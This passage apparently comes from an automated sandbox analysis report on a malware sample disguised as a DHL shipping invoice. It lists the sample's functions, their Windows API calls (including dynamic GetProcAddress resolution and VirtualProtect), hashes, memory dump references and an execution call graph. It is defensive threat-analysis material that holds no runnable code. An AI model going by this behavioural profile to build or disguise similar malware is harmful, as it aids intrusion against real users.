                                                                                                                                                                                                                                      • String ID: SHGetSpecialFolderPathW$shell32.dll
                                                                                                                                                                                                                                      • API String ID: 2773794195-880857682
                                                                                                                                                                                                                                      • Opcode ID: 92b59310a7696b31d56b4dabc8b2146732067b292673cf67eedff05cdcb4dbe7
                                                                                                                                                                                                                                      • Instruction ID: 520684b8054713cb13715c6c8af1848dbb459e29e8538d47b3508bbaa4bbc045
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 92b59310a7696b31d56b4dabc8b2146732067b292673cf67eedff05cdcb4dbe7
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 23D0C7719483019DD7105F65AC19B8336545B50307F204077AC04E66D7EA7CC4C49E1D
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetWindowLongW.USER32(?,000000EC), ref: 0040A159
                                                                                                                                                                                                                                      • SetWindowLongW.USER32(000000EC,000000EC,00000000), ref: 0040A16B
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000005.00000002.423701774240.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: LongWindow
                                                                                                                                                                                                                                      • String ID: MZ@
                                                                                                                                                                                                                                      • API String ID: 1378638983-2978689999
                                                                                                                                                                                                                                      • Opcode ID: 897d752f6043cc922bbe5e3779e5fd859b92255b25006c63bcdd8f44162c87a9
                                                                                                                                                                                                                                      • Instruction ID: 658df1d6f65a5f4ca5cf2dc917bfbc57e2b12ac14a328fb0c2cac09aa770bd9f
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 897d752f6043cc922bbe5e3779e5fd859b92255b25006c63bcdd8f44162c87a9
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3FC0027415D116AFDF112B35EC0AE2A7EA9BB86362F208BB4B076E01F1CB7184109A09
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,00000000,?), ref: 0042BA5F
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,?,?), ref: 0042BA98
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0042BAAE
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,00000000,?,?,?,?,?,?,?), ref: 0042BAE7
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000005.00000002.423701774240.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: memcpy$memset
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 438689982-0
                                                                                                                                                                                                                                      • Opcode ID: 03305e9dc29a3088a8453c5c8815f649f32074ab8e1cbf0618065e1a77e51243
                                                                                                                                                                                                                                      • Instruction ID: 797e1fd24865db6de4a95defd5ca955254a0dec7c2ff798398e4890fb9874305
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 03305e9dc29a3088a8453c5c8815f649f32074ab8e1cbf0618065e1a77e51243
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1B51A2B5A00219EBDF14DF55D882BAEBBB5FF04340F54806AE904AA245E7389E50DBD8
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 0040A13C: memset.MSVCRT ref: 0040A14A
                                                                                                                                                                                                                                      • ??2@YAPAXI@Z.MSVCRT ref: 0040E84D
                                                                                                                                                                                                                                      • ??2@YAPAXI@Z.MSVCRT(00000014), ref: 0040E874
                                                                                                                                                                                                                                      • ??2@YAPAXI@Z.MSVCRT(00000014), ref: 0040E895
                                                                                                                                                                                                                                      • ??2@YAPAXI@Z.MSVCRT(00000014), ref: 0040E8B6
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000005.00000002.423701774240.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ??2@$memset
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1860491036-0
                                                                                                                                                                                                                                      • Opcode ID: 96af4030734a5e2f6ef23c2ae6277f6dabdb1784b135b246f31e93988d402875
                                                                                                                                                                                                                                      • Instruction ID: 7dda0de82ffecb18951b1be6aadeef514c87807746e1e94fbb8d74dd8fa57bec
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 96af4030734a5e2f6ef23c2ae6277f6dabdb1784b135b246f31e93988d402875
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4F21F3B1A003008FDB219F2B9445912FBE8FF90310B2AC8AF9158CB2B2D7B8C454CF15
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • wcslen.MSVCRT ref: 0040A8E2
                                                                                                                                                                                                                                        • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                                                                                                                                                                                                        • Part of subcall function 004099F4: memcpy.MSVCRT(00000000,00000000,00000000,00000000,?,0040A9F2,00000002,?,00000000,?,0040AD25,00000000,?,00000000), ref: 00409A28
                                                                                                                                                                                                                                        • Part of subcall function 004099F4: free.MSVCRT ref: 00409A31
                                                                                                                                                                                                                                      • free.MSVCRT ref: 0040A908
                                                                                                                                                                                                                                      • free.MSVCRT ref: 0040A92B
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,000000FF,00000001,?,00000000,?,?,0040AD76,?,000000FF), ref: 0040A94F
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000005.00000002.423701774240.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: free$memcpy$mallocwcslen
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 726966127-0
                                                                                                                                                                                                                                      • Opcode ID: 48b5110f71ff603a034409774c278151667955e8266c70f87da55b4d75e749d9
                                                                                                                                                                                                                                      • Instruction ID: f32a9ac0308abec2140ef864181b54c8d04bf3279582b466e144db770ea3622c
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 48b5110f71ff603a034409774c278151667955e8266c70f87da55b4d75e749d9
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 64217CB2200704EFC720DF18D88189AB3F9FF453247118A2EF866AB6A1CB35AD15CB55
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • wcslen.MSVCRT ref: 0040B1DE
                                                                                                                                                                                                                                      • free.MSVCRT ref: 0040B201
                                                                                                                                                                                                                                        • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                                                                                                                                                                                                        • Part of subcall function 004099F4: memcpy.MSVCRT(00000000,00000000,00000000,00000000,?,0040A9F2,00000002,?,00000000,?,0040AD25,00000000,?,00000000), ref: 00409A28
                                                                                                                                                                                                                                        • Part of subcall function 004099F4: free.MSVCRT ref: 00409A31
                                                                                                                                                                                                                                      • free.MSVCRT ref: 0040B224
                                                                                                                                                                                                                                      • memcpy.MSVCRT(00000000,00000000,-00000002,00000000,00000000,?,?,?,?,0040B319,0040B432,00000000,?,?,0040B432,00000000), ref: 0040B248
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000005.00000002.423701774240.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: free$memcpy$mallocwcslen
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 726966127-0
                                                                                                                                                                                                                                      • Opcode ID: dbfa2e27eb608a9f9479d75297a1486c58e4153ca5a873f0eddd30e24b8e668e
                                                                                                                                                                                                                                      • Instruction ID: 71128cbd9221161776fa816c6212d75478d488e0bdd8d9cf72ea7cd81dda7be0
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: dbfa2e27eb608a9f9479d75297a1486c58e4153ca5a873f0eddd30e24b8e668e
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 02215BB2500604EFD720DF18D881CAAB7F9EF49324B114A6EE452976A1CB35B9158B98
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • memcmp.MSVCRT(?,004599B8,00000010,00000000,00409690,?,00408C27,00409690,?,00409690,00408801,00000000), ref: 00408AF3
                                                                                                                                                                                                                                        • Part of subcall function 00408A6E: memcmp.MSVCRT(00409690,00408B12,00000004,000000FF), ref: 00408A8C
                                                                                                                                                                                                                                        • Part of subcall function 00408A6E: memcpy.MSVCRT(00000363,004096AA,4415FF50,?), ref: 00408ABB
                                                                                                                                                                                                                                        • Part of subcall function 00408A6E: memcpy.MSVCRT(-00000265,004096AF,00000060,00000363,004096AA,4415FF50,?), ref: 00408AD0
                                                                                                                                                                                                                                      • memcmp.MSVCRT(?,00000000,0000000E,00000000,00409690,?,00408C27,00409690,?,00409690,00408801,00000000), ref: 00408B2B
                                                                                                                                                                                                                                      • memcmp.MSVCRT(?,00000000,0000000B,00000000,00409690,?,00408C27,00409690,?,00409690,00408801,00000000), ref: 00408B5C
                                                                                                                                                                                                                                      • memcpy.MSVCRT(0000023E,00409690,?), ref: 00408B79
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000005.00000002.423701774240.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: memcmp$memcpy
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 231171946-0
                                                                                                                                                                                                                                      • Opcode ID: cadc00b77c621a7338fc70958db42bdaca3a8748761d36a10e112d3b7644ebb1
                                                                                                                                                                                                                                      • Instruction ID: 684d12db3f6cc64b33ac9287d8c213aaad77bc3869a84850190dd4d7d2050874
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: cadc00b77c621a7338fc70958db42bdaca3a8748761d36a10e112d3b7644ebb1
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8411A9F1600308AAFF202A129D07F5A3658DB21768F25443FFC84641D2FE7DAA50C55E
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • strlen.MSVCRT ref: 0040B0D8
                                                                                                                                                                                                                                      • free.MSVCRT ref: 0040B0FB
                                                                                                                                                                                                                                        • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                                                                                                                                                                                                        • Part of subcall function 004099F4: memcpy.MSVCRT(00000000,00000000,00000000,00000000,?,0040A9F2,00000002,?,00000000,?,0040AD25,00000000,?,00000000), ref: 00409A28
                                                                                                                                                                                                                                        • Part of subcall function 004099F4: free.MSVCRT ref: 00409A31
                                                                                                                                                                                                                                      • free.MSVCRT ref: 0040B12C
                                                                                                                                                                                                                                      • memcpy.MSVCRT(00000000,?,00000000,00000000,0040B35A,?), ref: 0040B159
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000005.00000002.423701774240.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: free$memcpy$mallocstrlen
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3669619086-0
                                                                                                                                                                                                                                      • Opcode ID: 04e6466bee9c2f86a7d5fc6531cc0ab8b23c91005f7f75429686add4e9716e46
                                                                                                                                                                                                                                      • Instruction ID: 61abf4b4d63bdfee40e3433ef4540d9b033b11d4199be086b3082c0bee804e2f
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 04e6466bee9c2f86a7d5fc6531cc0ab8b23c91005f7f75429686add4e9716e46
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CA113A712042019FD711DB98FC499267B66EB8733AB25833BF4045A2A3CBB99834865F
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,00417D63,?,?,00417D63,00418178,00000000,?,004183E5,?,00000000), ref: 004173FF
                                                                                                                                                                                                                                      • malloc.MSVCRT ref: 00417407
                                                                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,?,00417D63,00418178,00000000,?,004183E5,?,00000000,00000000,?), ref: 0041741E
                                                                                                                                                                                                                                      • free.MSVCRT ref: 00417425
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000005.00000002.423701774240.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ByteCharMultiWide$freemalloc
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2605342592-0
                                                                                                                                                                                                                                      • Opcode ID: 2d709113fcafe1a04d94ccb325df1834664bd2c227d6907f8f745ae81c56706a
                                                                                                                                                                                                                                      • Instruction ID: cad4d062c051d68cf548c6c9b5623cfc012c7edadb1d539185634ca375d1558c
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2d709113fcafe1a04d94ccb325df1834664bd2c227d6907f8f745ae81c56706a
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E7F0377620921E7BDA1029655C40D77779CEB8B675B11072BBA10D21C1ED59D81005B5
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000005.00000002.423701774240.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: wcslen$wcscat$wcscpy
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1961120804-0
                                                                                                                                                                                                                                      • Opcode ID: 053325bc158fb100898e7a98b0c486d6a7ee737d4dfc05f729e58fd5416b10d2
                                                                                                                                                                                                                                      • Instruction ID: 298d28553a3f700387dea6c06157f027a7ba74c69b0fe1c0d14b010c740a3b55
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 053325bc158fb100898e7a98b0c486d6a7ee737d4dfc05f729e58fd5416b10d2
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3AE0E532000114BADF116FB2D8068CE3B99EF42364751883BFD08D2043EB3ED511869E

                                                                                                                                                                                                                                      Execution Graph

                                                                                                                                                                                                                                      Execution Coverage:2.4%
                                                                                                                                                                                                                                      Dynamic/Decrypted Code Coverage:19.8%
                                                                                                                                                                                                                                      Signature Coverage:0.5%
                                                                                                                                                                                                                                      Total number of Nodes:872
                                                                                                                                                                                                                                      Total number of Limit Nodes:22
                                                                                                                                                                                                                                      execution_graph 34104 40fc40 70 API calls 34277 403640 21 API calls 34105 427fa4 42 API calls 34278 412e43 _endthreadex 34279 425115 76 API calls 34280 43fe40 133 API calls 34108 425115 83 API calls 34109 401445 memcpy memcpy DialogBoxParamA 34110 440c40 34 API calls 34112 411853 RtlInitializeCriticalSection memset 34113 401455 ExitProcess GetWindowLongA SetWindowLongA EnumChildWindows EnumChildWindows 34286 40a256 13 API calls 34288 432e5b 17 API calls 34290 43fa5a 20 API calls 34115 401060 41 API calls 34293 427260 CloseHandle memset memset 33167 410c68 FindResourceA 33168 410c81 SizeofResource 33167->33168 33171 410cae 33167->33171 33169 410c92 LoadResource 33168->33169 33168->33171 33170 410ca0 LockResource 33169->33170 33169->33171 33170->33171 34295 405e69 14 API calls 34120 433068 15 API calls 34297 414a6d 18 API calls 34298 43fe6f 134 API calls 34122 424c6d 15 API calls 34299 426741 19 API calls 34124 440c70 17 API calls 34125 443c71 44 API calls 34128 427c79 24 API calls 34302 416e7e memset 34132 42800b 47 API calls 34133 425115 85 API calls 34305 41960c 61 API calls 34134 43f40c 122 API calls 34137 411814 InterlockedCompareExchange RtlDeleteCriticalSection 34138 43f81a 20 API calls 34140 414c20 memset memset 34141 410c22 memset _itoa WritePrivateProfileStringA GetPrivateProfileIntA 34309 414625 18 API calls 34310 404225 modf 34311 403a26 strlen WriteFile 34313 40422a 12 API calls 34317 427632 memset memset memcpy 34318 40ca30 59 API calls 34319 404235 26 API calls 34142 42ec34 61 API calls 34143 425115 76 API calls 34320 425115 77 API calls 34322 44223a 38 API calls 34149 43183c 112 API calls 34323 44b2c5 _onexit __dllonexit 34328 42a6d2 memcpy 34151 405cda 65 API calls 34336 43fedc 138 API calls 34337 4116e1 16 API calls 34154 4244e6 19 API calls 34156 42e8e8 127 API calls 34157 4118ee RtlLeaveCriticalSection 34342 43f6ec 22 API calls 34159 425115 119 API calls 33157 410cf3 EnumResourceNamesA 34345 4492f0 memcpy memcpy 34347 43fafa 18 API calls 34349 4342f9 15 API calls 34160 4144fd 19 API calls 34351 4016fd NtdllDefWindowProc_A ??2@YAPAXI memset memcpy ??3@YAXPAX 34352 40b2fe LoadIconA LoadIconA SendMessageA SendMessageA SendMessageA 34355 443a84 _mbscpy 34357 43f681 17 API calls 34163 404487 22 API calls 34359 415e8c 16 API calls 34167 411893 RtlDeleteCriticalSection 34168 41a492 42 API calls 34363 403e96 34 API calls 34364 410e98 memset SHGetPathFromIDList SendMessageA 34170 426741 109 API calls 34171 4344a2 18 API calls 34172 4094a2 10 API calls 34367 4116a6 15 API calls 34368 43f6a4 17 API calls 34369 440aa3 20 API calls 34371 427430 45 API calls 34175 4090b0 7 API calls 34176 4148b0 15 API calls 34178 4118b4 RtlEnterCriticalSection 34179 4014b7 CreateWindowExA 34180 40c8b8 19 API calls 34182 4118bf RtlTryEnterCriticalSection 34376 42434a 18 API calls 34378 405f53 12 API calls 34190 43f956 59 API calls 34192 40955a 17 API calls 34193 428561 36 API calls 34194 409164 7 API calls 34382 404366 19 API calls 34386 40176c ExitProcess 34389 410777 42 API calls 34199 40dd7b 51 API calls 34200 425d7c 16 API calls 34391 43f6f0 25 API calls 34392 42db01 22 API calls 34201 412905 15 API calls 34393 403b04 54 API calls 34394 405f04 SetDlgItemTextA GetDlgItemTextA 34395 44b301 ??3@YAXPAX 34398 4120ea 14 API calls 34399 40bb0a 8 API calls 34401 413f11 strcmp 34205 434110 17 API calls 34208 425115 108 API calls 34402 444b11 _onexit 34210 425115 76 API calls 34213 429d19 10 API calls 34405 444b1f __dllonexit 34406 409f20 _strcmpi 34215 42b927 31 API calls 34409 433f26 19 API calls 34410 44b323 FreeLibrary 34411 427f25 46 API calls 34412 43ff2b 17 API calls 34413 43fb30 19 API calls 34222 414d36 16 API calls 34224 40ad38 7 API calls 34415 433b38 16 API calls 34095 44b33b 34096 44b344 ??3@YAXPAX 34095->34096 34097 44b34b 34095->34097 34096->34097 34098 44b354 ??3@YAXPAX 34097->34098 34099 44b35b 34097->34099 34098->34099 34100 44b364 ??3@YAXPAX 34099->34100 34101 44b36b 34099->34101 34100->34101 34102 44b374 ??3@YAXPAX 34101->34102 34103 44b37b 34101->34103 34102->34103 34228 426741 21 API calls 34229 40c5c3 125 API calls 34231 43fdc5 17 API calls 34416 4117c8 InterlockedCompareExchange RtlInitializeCriticalSection 34234 4161cb memcpy memcpy memcpy memcpy 33172 44b3cf 33173 44b3e6 33172->33173 33178 44b454 33172->33178 33173->33178 33185 44b40e GetModuleHandleA 33173->33185 33175 44b45d GetModuleHandleA 33179 44b467 33175->33179 33176 44b49a 33198 44b49f 33176->33198 33178->33175 33178->33176 33178->33179 33179->33178 33180 44b487 GetProcAddress 33179->33180 33180->33178 33181 44b405 33181->33178 33181->33179 33182 44b428 GetProcAddress 33181->33182 33182->33178 33183 44b435 VirtualProtect 33182->33183 33183->33178 33184 44b444 VirtualProtect 33183->33184 33184->33178 33186 44b417 33185->33186 33188 44b454 33185->33188 33217 44b42b GetProcAddress 33186->33217 33190 44b45d GetModuleHandleA 33188->33190 33191 44b49a 33188->33191 33197 44b467 33188->33197 33189 44b41c 33189->33188 33193 44b428 GetProcAddress 33189->33193 33190->33197 33192 44b49f 777 API calls 33191->33192 33192->33191 33193->33188 33194 44b435 VirtualProtect 33193->33194 33194->33188 33195 44b444 VirtualProtect 33194->33195 33195->33188 33196 44b487 GetProcAddress 33196->33188 33197->33188 33197->33196 33199 444c4a 33198->33199 33200 444c56 GetModuleHandleA 33199->33200 33201 444c68 __set_app_type __p__fmode __p__commode 33200->33201 33203 444cfa 33201->33203 33204 444d02 __setusermatherr 33203->33204 33205 444d0e 33203->33205 33204->33205 33226 444e22 _controlfp 33205->33226 33207 444d13 _initterm __getmainargs _initterm 33208 444d6a GetStartupInfoA 33207->33208 33210 444d9e GetModuleHandleA 33208->33210 33227 40cf44 33210->33227 33214 444dcf _cexit 33216 444e04 33214->33216 33215 444dc8 exit 33215->33214 33216->33176 33218 44b454 33217->33218 33219 44b435 VirtualProtect 33217->33219 33221 44b45d GetModuleHandleA 33218->33221 33222 44b49a 33218->33222 33219->33218 33220 44b444 VirtualProtect 33219->33220 33220->33218 33225 44b467 33221->33225 33223 44b49f 777 API calls 33222->33223 33223->33222 33224 44b487 GetProcAddress 33224->33225 33225->33218 33225->33224 33226->33207 33278 404a99 LoadLibraryA 33227->33278 33229 40cf60 33266 40cf64 33229->33266 33286 410d0e 33229->33286 33231 40cf6f 33290 40ccd7 ??2@YAPAXI 33231->33290 33233 40cf9b 33304 407cbc 33233->33304 33238 40cfc4 33322 409825 memset 33238->33322 33239 40cfd8 33327 4096f4 memset 33239->33327 33244 40d181 ??3@YAXPAX 33246 40d1b3 33244->33246 33247 40d19f DeleteObject 33244->33247 33245 407e30 _strcmpi 33248 40cfee 33245->33248 33351 407948 free free 33246->33351 33247->33246 33250 40cff2 RegDeleteKeyA 33248->33250 33251 40d007 EnumResourceTypesA 33248->33251 33250->33244 33253 40d047 33251->33253 33254 40d02f MessageBoxA 33251->33254 33252 40d1c4 33352 4080d4 free 33252->33352 33256 40d0a0 CoInitialize 33253->33256 33332 40ce70 33253->33332 33254->33244 33349 40cc26 strncat memset RegisterClassA CreateWindowExA 33256->33349 33259 40d1cd 33353 407948 free free 33259->33353 33261 40d0b1 ShowWindow UpdateWindow LoadAcceleratorsA 33350 40c256 PostMessageA 33261->33350 33263 40d061 ??3@YAXPAX 33263->33246 33267 40d084 DeleteObject 33263->33267 33264 40d09e 33264->33256 33266->33214 33266->33215 33267->33246 33270 40d0f9 GetMessageA 33271 40d17b CoUninitialize 33270->33271 33272 40d10d 33270->33272 33271->33244 33273 40d113 TranslateAccelerator 33272->33273 33275 40d145 IsDialogMessage 33272->33275 33276 40d139 IsDialogMessage 33272->33276 33273->33272 33274 40d16d GetMessageA 33273->33274 33274->33271 33274->33273 33275->33274 33277 40d157 TranslateMessage DispatchMessageA 33275->33277 33276->33274 33276->33275 33277->33274 33279 404ac4 GetProcAddress 33278->33279 33280 404aec 33278->33280 33281 404ad4 33279->33281 33282 404add FreeLibrary 33279->33282 33284 404b13 33280->33284 33285 404afc MessageBoxA 33280->33285 33281->33282 33282->33280 33283 404ae8 33282->33283 33283->33280 33284->33229 33285->33229 33287 410d17 LoadLibraryA 33286->33287 33288 410d3c 33286->33288 33287->33288 33289 410d2b GetProcAddress 33287->33289 33288->33231 33289->33288 33291 40cd08 ??2@YAPAXI 33290->33291 33293 40cd26 33291->33293 33294 40cd2d 33291->33294 33361 404025 6 API calls 33293->33361 33296 40cd66 33294->33296 33297 40cd59 DeleteObject 33294->33297 33354 407088 33296->33354 33297->33296 33299 40cd6b 33357 4019b5 33299->33357 33302 4019b5 strncat 33303 40cdbf _mbscpy 33302->33303 33303->33233 33363 407948 free free 33304->33363 33308 407a1f malloc memcpy free free 33311 407cf7 33308->33311 33309 407ddc 33317 407e04 33309->33317 33376 407a1f 33309->33376 33311->33308 33311->33309 33312 407d7a free 33311->33312 33311->33317 33367 40796e 7 API calls 33311->33367 33368 406f30 33311->33368 33312->33311 33364 407a55 33317->33364 33318 407e30 33319 407e57 33318->33319 33320 407e38 33318->33320 33319->33238 33319->33239 33320->33319 33321 407e41 _strcmpi 33320->33321 33321->33319 33321->33320 33382 4097ff 33322->33382 33324 409854 33387 409731 33324->33387 33328 4097ff 3 API calls 33327->33328 33329 409723 33328->33329 33407 40966c 33329->33407 33421 4023b2 33332->33421 33337 40ced3 33510 40cdda 7 API calls 33337->33510 33338 40cece 33342 40cf3f 33338->33342 33462 40c3d0 memset GetModuleFileNameA strrchr 33338->33462 33342->33263 33342->33264 33345 40ceed 33489 40affa 33345->33489 33349->33261 33350->33270 33351->33252 33352->33259 33353->33266 33362 406fc7 memset _mbscpy 33354->33362 33356 40709f CreateFontIndirectA 33356->33299 33358 4019e1 33357->33358 33359 4019c2 strncat 33358->33359 33360 4019e5 memset LoadIconA 33358->33360 33359->33358 33360->33302 33361->33294 33362->33356 33363->33311 33365 407a65 33364->33365 33366 407a5b free 33364->33366 33365->33318 33366->33365 33367->33311 33369 406f37 malloc 33368->33369 33370 406f7d 33368->33370 33372 406f73 33369->33372 33373 406f58 33369->33373 33370->33311 33372->33311 33374 406f6c free 33373->33374 33375 406f5c memcpy 33373->33375 33374->33372 33375->33374 33377 407a38 33376->33377 33378 407a2d free 33376->33378 33379 406f30 3 API calls 